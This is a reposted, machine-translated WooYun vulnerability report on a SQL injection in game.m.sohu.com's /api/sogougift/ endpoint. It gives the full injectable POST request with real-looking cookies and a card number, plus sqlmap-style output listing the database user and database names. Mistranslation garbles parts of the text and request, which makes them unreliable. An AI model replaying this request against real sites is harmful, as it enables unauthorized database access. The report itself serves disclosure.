漏洞标题 搜狐分站存在SQL注入 相关厂商 搜狐 漏洞作者 Vinc 提交时间 2016-05-02 20:43 公开时间 2016-06-17 00:00 漏洞类型 SQL注射漏洞 危害等级 高 自…
漏洞标题
搜狐变电站有SQL注入
相关制造商
搜狐
漏洞作者
时Vinc
提交时间
2016-05-02 20: 43
公共时间
2016-06-17 00: 00
漏洞类型
SQL注入漏洞
危险等级
高
自我评估等级
12
漏洞状态
制造商已确认
标签标签
Sql注入
漏洞详细信息
网站:game.m.sohu.com
POST的内容如下:
POST/api/sogougift/HTTP/1.1
内容长度: 89
内容类型: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer:http://game.m.sohu.com
Cookie: _smuid=AHbLM0wQqbLil8QXm3Q3lx; game_user=1; IPLOC=CN1100; sg_gift_id1839=1839; card_no1839=3AWQ-NTY7-DEZ5-Z3SB
主机: game.m.sohu.com
连接:保持活动状态
Accept-Encoding: gzip,deflate
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.21(KHTML,与Gecko一样)Chrome/41.0.2228.0 Safari/537.21
接受: */*
Gift_id=1839&安培; Smuid的=*
漏洞证明:
Web应用程序技术: Nginx
后端DBMS: MySQL>=5.0.0
[17: 49: 09] [INFO]获取当前用户
[17: 49: 09] [警告]以单线程模式运行。请考虑使用o
Ption'--threads'用于更快的数据检索
[17: 49: 09] [INFO]检索到: game_shouyou @%
当前用户:'game_shouyou @%'
当前数据库:'game_shouyou'
可用数据库[4]:
[*] game_jifen
[*] game_shouyou
[*] information_schema
[*]测试
修理计划:
。
版权声明:请注明出处Vinc @乌云
-
发表于 2016-07-17 08:00
- 阅读 ( 695 )
- 分类:黑客技术